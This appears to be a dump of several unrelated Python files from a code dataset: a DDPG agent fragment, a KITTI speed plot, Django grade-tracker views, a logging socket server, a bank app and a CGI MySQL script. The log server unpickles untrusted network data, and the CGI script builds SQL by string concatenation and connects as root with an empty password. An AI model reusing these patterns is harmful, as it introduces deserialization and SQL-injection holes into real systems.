torch.from_numpy(s_t_array).type(torch.FloatTensor).to(device)\n actor_output = to_numpy(self.actor(s_t_array_tensor)) #bsize(1) x actor_output_shape\n actor_output += self.is_training*max(self.epsilon, 0)*self.random_process.sample()\n action = self.actor.select_beams(actor_output, self.num_beams_per_UE).squeeze(0)\n # action = to_numpy(\n # self.actor(to_tensor(np.array([s_t])))\n # ).squeeze(0)\n # action = np.clip(action, -1., 1.)\n \n if decay_epsilon:\n self.epsilon -= self.depsilon\n \n self.a_t = action\n return action\n \n # def pick_beams(self, observation:np.ndarray):\n # #observation is batchsize x num_measurements x num_beams matrix, iteratively pick best beam\n # selected_beams = np.argsort(np.sum(observation,axis=0))[-self.num_beams_per_UE:]\n # binary_beams = np.zeros(self.nb_actions)\n # binary_beams[selected_beams] = 1\n \n # # selected_beams = []\n # # pool = list(np.arange(self.nb_actions))\n # # sum_tp = np.sum(observation,axis=0)\n # # sel_beam = np.argmax(sum_tp)\n # # selected_beams.append(sel_beam)\n # # pool.remove(sel_beam)\n \n # # for it_idx in range(self.num_beams_per_UE):\n # # sum_tp = np.sum(observation[pool,:],axis=0)\n # # sel_beam = np.argmax(sum_tp)\n # # selected_beams.append(sel_beam)\n # # pool.remove(sel_beam)\n \n # return binary_beams\n \n # def pick_beams_batch(self, observation:np.ndarray):\n # assert(observation.shape[0] == self.batch_size)\n # binary_beams = np.zeros((self.batch_size, self.nb_actions))\n # for i in range(self.batch_size):\n # binary_beams[i,:] = self.pick_beams(observation[i])\n # return binary_beams\n # def reset(self, obs):\n # self.ob_t = obs\n # self.random_process.reset_states()\n \n # modified reset() function that also takes in initial beam config\n def reset(self, obs):\n self.ob_t = obs\n # self.a_t = beams\n self.random_process.reset_states()\n # self.policy_update_counter = 0\n # self.training_log = {'critic_mse':[],'actor_mse':[],'actor_value':[],'actor_total':[]}\n\n def load_weights(self, output):\n if output is None: return\n\n self.actor.load_state_dict(\n torch.load('{}/actor.pkl'.format(output))\n )\n\n self.critic.load_state_dict(\n torch.load('{}/critic.pkl'.format(output))\n )\n\n\n def save_model(self,output):\n torch.save(\n self.actor.state_dict(),\n '{}/actor.pkl'.format(output)\n )\n torch.save(\n self.critic.state_dict(),\n '{}/critic.pkl'.format(output)\n )\n\n def seed(self,s):\n torch.manual_seed(s)\n if USE_CUDA:\n torch.cuda.manual_seed(s)\n","sub_path":"SubActionDDPG.py","file_name":"SubActionDDPG.py","file_ext":"py","file_size_in_byte":12289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"107548505","text":"import torch\nimport torchvision\nimport os\nimport glob\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nfrom myflownet import MyFlownetS\nimport numpy as np\nimport PIL.Image\nimport moving_average as ma\n\nOXTS_DIR='oxts/data'\nIMAGE_DIR='image_02/data'\n\nIDX_VN = 6\nIDX_VE = 7\nIDX_VF = 8\nIDX_VL = 9\nIDX_VU = 10\n\nx_res = 610\ny_res = 370\n\ndef le_velocidade_oxts(path_to_sync_folder):\n\n oxts_dir = os.path.join(path_to_sync_folder, OXTS_DIR)\n \n list_files = glob.glob(os.path.join(oxts_dir, '*'))\n list_files.sort()\n velocities = []\n for fname in list_files:\n \n with open(os.path.join(oxts_dir, fname), 'r') as oxts_file:\n oxts_values = oxts_file.read().split()\n\n vn = float(oxts_values[IDX_VN])\n ve = float(oxts_values[IDX_VE])\n vf = float(oxts_values[IDX_VF])\n vl = float(oxts_values[IDX_VL])\n vu = 
float(oxts_values[IDX_VU])\n speed = sqrt(vn**2+ve**2)\n #num = int(os.path.splitext(basename0)[0])\n\n velocities.append(speed)\n\n return velocities\n\ndef le_imagens(path_to_sync_folder):\n\n images_dir = os.path.join(path_to_sync_folder, IMAGE_DIR)\n \n list_files = glob.glob(os.path.join(images_dir, '*'))\n list_files.sort()\n images_fullpath = []\n for fname in list_files:\n images_fullpath.append(fname)\n \n\n return images_fullpath\n\ndef grafico_kitti(model, device, path_to_sync_folder):\n\n model.eval()\n \n v_list = le_velocidade_oxts(path_to_sync_folder)\n images_list = le_imagens(path_to_sync_folder)\n\n transforms = torchvision.transforms.Compose([\n torchvision.transforms.CenterCrop((y_res, x_res)),\n torchvision.transforms.ToTensor() \n ])\n pred = []\n for i in range(len(images_list)-1):\n img0 = PIL.Image.open(images_list[i])\n img1 = PIL.Image.open(images_list[i+1])\n img0_tensor = transforms(img0).to(device, torch.float)\n img1_tensor = transforms(img1).to(device, torch.float)\n imgs = torch.cat((img0_tensor, img1_tensor), dim=0)\n pred_vel = model(imgs[None, :]).item()\n pred.append(pred_vel)\n \n window_size = 10 \n pred = np.array(pred).reshape(-1, 1)\n pred = np.array(ma.moving_average(pred.flatten(), window_size, [1,2,3,5,5,5,7,7,7,10]))\n v_list = np.array(v_list)[:-1]\n pred = np.pad(pred, pad_width=(0, window_size-1), mode='edge')\n error = pred - v_list\n plt.plot(pred, label='predicted')\n plt.plot(v_list, label='ground truth')\n #plt.plot(error, label='error')\n plt.xlabel('frame')\n plt.ylabel('speed (m/s)')\n plt.legend()\n plt.title('Trip 2011_09_26 0070 (with moving average)')\n\n\n mae = np.mean(np.abs(pred.flatten() - v_list.flatten()))\n plt.text(100, 5, 'Mean Absolute Error {} m/s'.format(\"{0:.4f}\".format(mae)))\n plt.show()\n\n \n print(\"MAE \", mae)\n \n\n\n\ndef main():\n\n sync_folder = '/mnt/kitti/dataset/test/2011_09_26/2011_09_26_drive_0070_sync'\n device = torch.device('cuda')\n model = MyFlownetS(device, batchNorm=True).to(device)\n model.load_state_dict(torch.load('models/model_9.pth')['state_dict']) \n\n grafico_kitti(model, device, sync_folder)\n\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"grafico_viagem.py","file_name":"grafico_viagem.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469590094","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\n\nfrom gradetracker.models import *\nfrom gradetracker.forms import *\n\n### Non-view helper functions ###\ndef is_teacher(user):\n \"\"\" Returns True if passed user is a Teacher and false otherwise.\"\"\"\n return user.get_profile().user_type == 'T'\n \ndef in_course(user, course_id):\n \"\"\"\n Returns True if passed user is either teaching or studying course\n with passed course_id, and False otherwise.\n \"\"\"\n course = Course.objects.get(id=course_id)\n if is_teacher(user):\n return course in user.courses_teaching.all()\n else:\n return course in user.courses_studying.all()\n \n### End of non-view helper functions ###\n\n\ndef home(request):\n \"\"\"\n Grade tracker application home page.\n \"\"\"\n return render_to_response('gradetracker/home.html',\n RequestContext(request))\n \n@login_required\ndef courses_index(request):\n user = 
request.user\n \n if is_teacher(user):\n courses_list = user.courses_teaching.all().order_by('-year', '-semester')\n else:\n courses_list = user.courses_studying.all().order_by('-year', '-semester')\n \n return render_to_response('gradetracker/courses_index.html', \\\n RequestContext(request,\n {'courses_list':courses_list,\n 'is_teacher':is_teacher(user)}))\n\n@login_required\ndef coursedetail(request, course_id):\n course = get_object_or_404(Course, pk=course_id) # pk is primary key\n if in_course(request.user, course_id):\n return render_to_response('gradetracker/coursedetail.html',\n RequestContext(request,\n {'course':course,\n 'is_teacher':is_teacher(request.user)}))\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef assignmentdetail(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n grades_dict = {}\n \n if in_course(user, course_id):\n if is_teacher(request.user):\n for student in course.students.all():\n try:\n grades_dict[student.id] = assignment.grade_set.get(student__id=student.id)\n except Grade.DoesNotExist:\n grades_dict[student.id] = Grade(assignment=assignment,\n student=student,\n grade=\"Not Available\")\n \n else:\n try:\n grades_dict[user.id] = assignment.grade_set.get(student__id=user.id)\n except Grade.DoesNotExist:\n grades_dict[user.id] = Grade(assignment=assignment,\n student=user,\n grade=\"Not Available\")\n \n return render_to_response('gradetracker/assignmentdetail.html', \\\n RequestContext(request,\n {'course':course,\n 'assignment':assignment,\n 'grades_dict':grades_dict,\n 'is_teacher':is_teacher(user)}))\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request)) \n\n@login_required\ndef gradesdetail(request, user_id, course_id):\n student = get_object_or_404(User, pk=user_id)\n course = get_object_or_404(Course, pk=course_id)\n grades_dict = {}\n \n try:\n course_grade = course.coursegrade_set.get(student__id=user_id).course_grade\n except CourseGrade.DoesNotExist:\n course_grade = \"Not Available\"\n \n if (int(request.user.id) == int(user_id)) or \\\n (request.user in course.teachers.all()):\n for assignment in course.assignment_set.all():\n try:\n grades_dict[assignment.id] = assignment.grade_set.get(student__id=user_id)\n except Grade.DoesNotExist:\n grades_dict[assignment.id] = Grade(assignment=assignment,\n student=student,\n grade='Not Available')\n \n return render_to_response('gradetracker/gradedetail.html', \\\n RequestContext(request,\n {'student':student,\n 'course':course,\n 'grades_dict':grades_dict,\n 'course_grade':course_grade,\n 'is_teacher':is_teacher(request.user)}))\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/oneroom/gradetracker/')\n \ndef register_page(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n \n # save new user if registration data is valid\n if form.is_valid():\n user = User(username=form.cleaned_data['username'],\n first_name=form.cleaned_data['first_name'],\n last_name=form.cleaned_data['last_name'],\n email=form.cleaned_data['email'])\n user.save()\n user.set_password(form.cleaned_data['password1'])\n # user profile stores additional info about user_type(Teacher or Student)\n profile = 
UserProfile(user_type=form.cleaned_data['user_type'],\n user=user)\n profile.save()\n user.save()\n \n # log in new user and redirect to success page\n user = authenticate(username=form.cleaned_data['username'],\n password=form.cleaned_data['password1'])\n login(request, user)\n # Redirect to a success page\n return HttpResponseRedirect('/oneroom/accounts/regsuccess/')\n \n else:\n form = RegistrationForm()\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('registration/register.html', variables)\n \n@login_required\ndef password_change_page(request):\n if request.method == 'POST':\n form = PasswordChangeForm(request.user, request.POST)\n \n if form.is_valid():\n request.user.set_password(form.cleaned_data['new_password1'])\n request.user.save()\n return HttpResponseRedirect('/oneroom/accounts/updatesuccess/')\n else:\n form = PasswordChangeForm(request.user)\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('registration/password.html', variables)\n \n@login_required\ndef email_change_page(request):\n if request.method == 'POST':\n form = EmailChangeForm(request.POST)\n if form.is_valid():\n request.user.email = form.cleaned_data['email']\n request.user.save()\n return HttpResponseRedirect('/oneroom/accounts/updatesuccess/')\n else:\n form = EmailChangeForm(initial={'email':request.user.email})\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('registration/email.html', variables)\n \n@login_required\ndef courses_add(request):\n user = request.user\n if is_teacher(user):\n if request.method == 'POST':\n form = CourseAddForm(request.POST)\n if form.is_valid():\n course = Course(name=form.cleaned_data['name'],\n year=form.cleaned_data['year'],\n semester=form.cleaned_data['semester'],\n passcode=form.cleaned_data['passcode2'])\n course.save()\n course.teachers.add(user)\n course.save()\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_create_success.html', variables)\n else:\n form = CourseAddForm()\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/courses_add.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef course_edit(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n if user in course.teachers.all():\n if request.method == 'POST':\n form = CourseAddForm(request.POST)\n if form.is_valid():\n course.name = form.cleaned_data['name']\n course.year = form.cleaned_data['year']\n course.semester = form.cleaned_data['semester']\n course.save()\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_edit_success.html', variables)\n else:\n form = CourseAddForm(initial={'name':course.name,\n 'year':course.year,\n 'semester':course.semester})\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/course_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_delete(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n if user in course.teachers.all():\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_delete_confirm.html', variables)\n else:\n return 
render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_delete_confirmed(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n if user in course.teachers.all():\n course.delete()\n return HttpResponseRedirect('/oneroom/gradetracker/course/delete/success/')\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_remove_user(request, course_id, user_id):\n \"\"\"Removes user from course\"\"\"\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n user_tobe_removed = get_object_or_404(User, pk=user_id)\n \n if (int(user.id) == int(user_id)) or \\\n (user in course.teachers.all() and user_tobe_removed in course.students.all()):\n # user can always remove self; teachers can remove students in the course\n variables = RequestContext(request, {'course':course,\n 'user_tobe_removed':user_tobe_removed})\n return render_to_response('gradetracker/course_remove_user_confirm.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_remove_user_confirmed(request, course_id, user_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n user_tobe_removed = get_object_or_404(User, pk=user_id)\n \n if (int(user.id) == int(user_id)) or \\\n (user in course.teachers.all() and user_tobe_removed in course.students.all()):\n if is_teacher(user_tobe_removed):\n course.teachers.remove(user_tobe_removed)\n else:\n course.students.remove(user_tobe_removed)\n course.save()\n \n variables = RequestContext(request, {'course':course,\n 'user_tobe_removed':user_tobe_removed,\n 'is_teacher':is_teacher(user_tobe_removed)})\n return render_to_response('gradetracker/course_remove_user_success.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef courses_all(request):\n \"\"\" displays all courses, including ones that the user is not part off \"\"\"\n courses_list = Course.objects.all().order_by('name', '-year')\n \n return render_to_response('gradetracker/all_courses.html', \\\n RequestContext(request,\n {'courses_list':courses_list,\n 'is_teacher':is_teacher(request.user)}))\n \n@login_required\ndef course_add_user(request, course_id, user_id):\n \"\"\"Adds user to course\"\"\"\n course = get_object_or_404(Course, pk=course_id)\n \n variables = RequestContext(request, {'course':course,\n 'is_teacher':is_teacher(request.user)})\n return render_to_response('gradetracker/course_add_user_confirm.html', variables)\n \n@login_required\ndef course_add_user_confirmed(request, course_id, user_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n\n if is_teacher(user):\n redirect_url = '/oneroom/gradetracker/course' + course_id + '/user' + user_id + '/add_teacher/'\n return HttpResponseRedirect(redirect_url)\n else:\n course.students.add(user)\n course.save() \n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_add_user_success.html', variables)\n\n@login_required\ndef course_add_teacher(request, course_id, user_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n \n if is_teacher(user):\n if request.method == 'POST':\n form = CoursePasscodeForm(request.POST)\n if form.is_valid():\n passcode = form.cleaned_data['passcode']\n if passcode == 
course.passcode:\n course.teachers.add(user)\n course.save()\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_add_user_success.html', variables)\n else:\n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/course_add_teacher_bad_passcode.html', variables)\n else:\n form = CoursePasscodeForm()\n \n variables = RequestContext(request, {'form':form,\n 'course':course})\n return render_to_response('gradetracker/course_add_teacher_passcode.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef assignment_add(request, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = AssignmentAddForm(request.POST)\n if form.is_valid():\n assignment = Assignment(name=form.cleaned_data['name'],\n due_date=form.cleaned_data['due_date'])\n assignment.course = course\n assignment.save()\n \n variables = RequestContext(request, {'course':course})\n return render_to_response('gradetracker/assignment_add_success.html', variables)\n else:\n form = AssignmentAddForm()\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/assignments_add.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef assignment_edit(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = AssignmentAddForm(request.POST)\n if form.is_valid():\n assignment.name = form.cleaned_data['name']\n assignment.due_date = form.cleaned_data['due_date']\n assignment.save()\n \n variables = RequestContext(request, {'course':course,\n 'assignment':assignment})\n return render_to_response('gradetracker/assignment_edit_success.html', variables)\n else:\n form = AssignmentAddForm(initial={'name':assignment.name,\n 'due_date':assignment.due_date})\n \n variables = RequestContext(request, {'form':form})\n return render_to_response('gradetracker/assignment_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef assignment_delete(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n if user in course.teachers.all():\n variables = RequestContext(request, {'course':course,\n 'assignment':assignment})\n return render_to_response('gradetracker/assignment_delete_confirm.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef assignment_delete_confirmed(request, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n if user in course.teachers.all():\n assignment.delete()\n variables = RequestContext(request, {'course':course,\n 'assignment':assignment})\n return render_to_response('gradetracker/assignment_delete_success.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef 
grade_edit(request, student_id, course_id, assignment_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n student = get_object_or_404(User, pk=student_id)\n assignment = get_object_or_404(Assignment, pk=assignment_id)\n \n try:\n grade = assignment.grade_set.get(student__id=student_id)\n except Grade.DoesNotExist:\n grade = Grade(assignment=assignment,\n student=student,\n grade=\"\")\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = GradeEditForm(request.POST)\n if form.is_valid():\n grade.grade = form.cleaned_data['grade']\n grade.save()\n \n variables = RequestContext(request, {'course':course,\n 'student':student,\n 'assignment':assignment})\n return render_to_response('gradetracker/grade_edit_success.html', variables)\n else:\n form = GradeEditForm(initial={'grade':grade.grade})\n \n variables = RequestContext(request, {'form':form,\n 'course':course,\n 'student':student,\n 'assignment':assignment})\n return render_to_response('gradetracker/grade_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n \n@login_required\ndef course_grade_edit(request, student_id, course_id):\n user = request.user\n course = get_object_or_404(Course, pk=course_id)\n student = get_object_or_404(User, pk=student_id)\n \n try:\n course_grade = course.coursegrade_set.get(student__id=student_id)\n except CourseGrade.DoesNotExist:\n course_grade = CourseGrade(course=course,\n student=student,\n course_grade=\"\")\n \n if user in course.teachers.all():\n if request.method == 'POST':\n form = GradeEditForm(request.POST)\n if form.is_valid():\n course_grade.course_grade = form.cleaned_data['grade']\n course_grade.save()\n \n variables = RequestContext(request, {'course':course,\n 'student':student})\n return render_to_response('gradetracker/coursegrade_edit_success.html', variables)\n else:\n form = GradeEditForm(initial={'grade':course_grade.course_grade})\n \n variables = RequestContext(request, {'form':form,\n 'course':course,\n 'student':student})\n return render_to_response('gradetracker/coursegrade_edit.html', variables)\n else:\n return render_to_response('gradetracker/nopermission.html',\n RequestContext(request))\n\n@login_required\ndef search_page(request):\n form = SearchForm()\n courses_list = []\n show_results = False\n query = \"\"\n \n if 'query' in request.GET:\n show_results = True\n query = request.GET['query'].strip()\n if query:\n form = SearchForm({'query' : query})\n courses_list = Course.objects.filter(name__icontains=query)\n \n variables = RequestContext(request,\n {'form':form,\n 'courses_list':courses_list,\n 'show_results':show_results,\n 'is_teacher':is_teacher(request.user),\n 'query':query})\n if 'ajax' in request.GET:\n return render_to_response('gradetracker/courses_list.html', variables)\n else:\n return render_to_response('gradetracker/search.html', variables)","sub_path":"gradetracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179528250","text":"import sys\nimport pickle\nimport struct\nimport logging\nimport logging.handlers\nimport socketserver\n\nSERVER_SHUTDOWN_MESSAGE = 'LOG_SERVER_SHUTDOWN_REQUEST'\n\n\nclass LogRecordStreamHandler(socketserver.StreamRequestHandler):\n '''\n Handler for a streaming logging request.\n '''\n\n def handle(self):\n '''\n Waits for packets to be sent via the open socket 
connection\n and logs them once they have been received\n '''\n while True:\n chunk = self.connection.recv(4)\n if len(chunk) < 4:\n break\n slen = struct.unpack('>L', chunk)[0] # '>L' format stands for big-endian (>) unsigned long (L)\n chunk = self.connection.recv(slen)\n while len(chunk) < slen:\n chunk = chunk + self.connection.recv(slen - len(chunk))\n obj = pickle.loads(chunk)\n record = logging.makeLogRecord(obj)\n if record.getMessage() == SERVER_SHUTDOWN_MESSAGE:\n self.server.shutdown()\n self.handleRecord(record)\n\n def handleRecord(self, record):\n '''\n Logs the :param: record according the logging handlers specified upon initialization\n :param record: LogRecord received from open socket from a distant logger\n '''\n self.server.logger.handle(record)\n\n\nclass LogRecordSocketReceiver(socketserver.ThreadingTCPServer):\n '''\n TCP Server which serves until shutdown message arrives\n from queue.\n '''\n\n def __init__(self, host='localhost',\n port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,\n handler=LogRecordStreamHandler,\n log_path=None, Queue=None):\n socketserver.ThreadingTCPServer.__init__(self, (host, port), handler)\n self.shutdown_is_requested = False\n self.timeout = 1\n self.logger = self.initialize_root_log_server_socket(log_path)\n\n def initialize_root_log_server_socket(self, log_path):\n '''\n IMPORTANT: the logger MUST be the root logger, otherwise\n the handlers attached to it will be ignored\n\n Initializes root logger to print to standard output\n and to a log file located in :param: log_path\n :param log_path: Path where log file will be saved\n '''\n logger = logging.getLogger('ServerLogger')\n console_handler = logging.StreamHandler(stream=sys.stdout)\n file_handler = logging.FileHandler(filename=log_path)\n log_format = logging.Formatter(fmt='[%(asctime)s]:%(levelname)s:%(name)s: %(message)s', datefmt='%m-%d %H:%M:%S')\n\n console_handler.setFormatter(log_format)\n file_handler.setFormatter(log_format)\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n return logger\n\n def shutdown(self):\n self.shutdown_is_requested = True\n\n def serve_until_stopped(self):\n import select\n while not self.shutdown_is_requested:\n rd, wr, ex = select.select([self.socket.fileno()],\n [], [],\n self.timeout)\n if rd:\n self.handle_request()\n self.logger.warning('Server shutting down, no further logs will be saved')\n\n\ndef serve_logging_server_forever(log_path):\n '''\n Starts a TCPServer that spawns a new thread for each connection\n (analogous to creating a new connection per logger).\n TODO: figure out a way of shutting the server down upon completion :param log_path: Path where log file will be saved\n '''\n tcpserver = LogRecordSocketReceiver(host='localhost',\n port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,\n handler=LogRecordStreamHandler,\n log_path=log_path)\n tcpserver.serve_until_stopped()\n\n\nif __name__ == '__main__':\n serve_logging_server_forever('logs')\n","sub_path":"regym/logging_server/log_server_socket.py","file_name":"log_server_socket.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302826833","text":"from bank import bankAccount\n\n#Create bank account object\nbank = bankAccount('bank.json')\n\n#Login to account\nprint(\"Please login to access your account.\")\nbank.login()\n\n#List of options\noptions = (\"View Balance\", \"Withdraw\", \"Deposit\", \"Exit\")\nlenOptions = len(options)\n\ndef bankOptions():\n #Shows 
options\n for index in range(0, lenOptions):\n print(str(index + 1) + \": \" + options[index])\n\n try:\n #Prompts user\n choice = 0\n while choice not in (1,2,3,4):\n choice = int(input(\"Please select an option from the list above: \"))\n\n if choice == 1:\n bank.getBalance()\n elif choice == 2:\n amount = int(input(\"Please enter the amount you'd like to withdraw: \"))\n bank.withdraw(amount)\n bank.getBalance()\n elif choice == 3:\n amount = int(input(\"Please enter the amount you'd like to deposit: \"))\n bank.deposit(amount)\n bank.getBalance()\n elif choice == 4:\n print(\"Thank you for banking with Bouchard Credit Union, have a nice day!\")\n exit()\n\n\n #Prompts user\n again = 0\n while again not in (1,2):\n again = int(input(\"Would you like to continue using the app? Press 1 to continue and 2 to quit: \"))\n if again == 1:\n bankOptions()\n elif again == 2:\n print(\"Thank you for banking with Bouchard Credit Union, have a nice day!\")\n exit()\n #Accounts for non int-type inputs to both prompts\n except ValueError:\n print(\"You have entered an invalid option. Please try again!\")\n bankOptions()\n\nbankOptions()\n","sub_path":"bankApp/bankApp.py","file_name":"bankApp.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631890662","text":"#!/usr/bin/python3\n\"\"\"\nSave topic title and solution to MySQL database and shelve file 'topics'\n\nweb server calls line 1 to load and run this module.\n\"\"\"\n\nfrom __future__ import print_function;\nfrom __future__ import division;\nfrom __future__ import unicode_literals;#not work with Python2.7 shelve module?\nfrom __future__ import absolute_import;\n\nimport sys;\nimport pymysql;\nimport cgi, cgitb; cgitb.enable();\n\nimport utility;#custom module\n\nmajor = sys.version_info.major; # 2 or 3\nminor = sys.version_info.minor; # 7 or 4\n\n'''\nmysql> describe howto.topics;\n+----------+----------+------+-----+---------+----------------+\n| Field | Type | Null | Key | Default | Extra |\n+----------+----------+------+-----+---------+----------------+\n| id | int(11) | NO | PRI | NULL | auto_increment |\n| title | text | YES | | NULL | |\n| solution | longtext | YES | | NULL | |\n+----------+----------+------+-----+---------+----------------+\n3 rows in set (0.01 sec)\n\nCAUTION:\nPython2.7 shelve key may need to be non-unicode string so do myShelve[str(key)].\n'''\n\n\n\ncolumns = [];#list of column values for database input, ie ['\"user\"', '\"pwd\"']\ncontent = [];\n\n#returned class ->\n#\tFieldStorage(None,None,[MiniFieldStorage('topic_title','hi'),\n#\tMiniFieldStorage('topic_solution','home sweet home')])\nrequest = cgi.FieldStorage();\n\nkey_topic_textbox_name = 'topic_title';\nkey_solution_textarea_name = 'topic_solution';\n\ntry:#make connection\n\tconn = pymysql.connect(host='localhost', user='root', password='',\\\n\t\tdatabase='vad');\n\tcursor = conn.cursor();# get cursor to perform action\n\n\t#data from client is for one row (at a time) in database\n\t#request[key] -> MiniFieldStorage('topic_title','hi'); read via name, value\n\t#textbox HTML element contains 'topic_title'; represents a name-value pair\n\t#textarea HTML element contains 'topic_solution'; represents a name-value pair\n\t#for key in request:#effectively, for each data entry HTML element with name-value\n\t\t#works for single or multiple values, ie as single value or list of values\n\t\t#characters < > \" are replaced with HTML entities\n\t\t#columns.append('\"' + 
utility.escape(request.getlist(key)[0]) + '\"');\n\t\n\t#characters < > \" are replaced with HTML entities\n\tif (key_topic_textbox_name in request) and \\\n\t(key_solution_textarea_name in request):\n\t\t#get and escape topic_title value\n\t\ttopic_title = utility.escape(request.getlist(key_topic_textbox_name)[0]);\n\t\t#get and escape topic_solution value\n\t\ttopic_solution = utility.escape(\\\n\t\t\trequest.getlist(key_solution_textarea_name)[0]);\n\t\t#store topic_title,topic_solution as key,value pair in shelve file\t\n\t\tutility.write_to_shelve_file(topic_title, topic_solution);\n\t\t#setup text to be used in sql insert syntax, \n\t\t#\tie in insert...values(\"topic_title\",\"topic_solution\");\n\t\tcolumns.append('\"' + topic_title + '\"');\n\t\tcolumns.append('\"' + topic_solution + '\"');\n\t#compose sql insert syntax\n\tcontent = '(' + ','.join(columns) + ')';\n\tcontent = 'insert into howto.topics (title,solution) values ' + content + ';';\n\t\n\t#cursor.execute('select * from vad.contacts;');#returns number of rows found\n\tcursor.execute(content); # returns number of rows affected\n\tconn.commit();#ensure changes made in actual database\n\tcursor.close();\n\tconn.close();#clean up\nexcept Exception as err:\n\t(excType, excDetail, traceback) = sys.exc_info();\n\tcontent = 'ExceptionType: {:}\\nExceptionDetail: {:}\\n'\\\n\t\t.format(excType, excDetail);\n\tcontent = err.__str__();\t\n\tif conn:\n\t\tconn.close();\n\n#store_key_value(str(cgi.escape(content)), 'sql execute query');#ok\n\nprint('Content-Type: text/plain; charset=utf-8\\n\\n');\n\n#print(request.getlist('topic_title'));\n#print( request['topic_title'] );\nprint(content);\nprint(utility.escape( content) );\nprint(request);\n\n\n\n","sub_path":"mycode/howto/cgi-bin/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148278316","text":"import unittest\r\n\r\nfrom python.src.FormChop import form_json_to_dict\r\nfrom python.src.FormChop import form_dict_cleanup\r\n\r\nfrom python.test.static.monitor_output_sample_output import sample_output\r\n\r\nclass TestFormChopJsonToDict(unittest.TestCase):\r\n def test_form_json_to_dict_output_fake_file(self):\r\n \"\"\" A fake file should raise an exception \"\"\"\r\n test_file = 'static/fake_file.json'\r\n\r\n with self.assertRaises(ValueError):\r\n test_output = form_json_to_dict(test_file)\r\n\r\n def test_form_json_to_dict_output_real_file_not_empty(self):\r\n \"\"\" A real file should return a non-empty dict \"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n self.assertNotEqual(test_output, 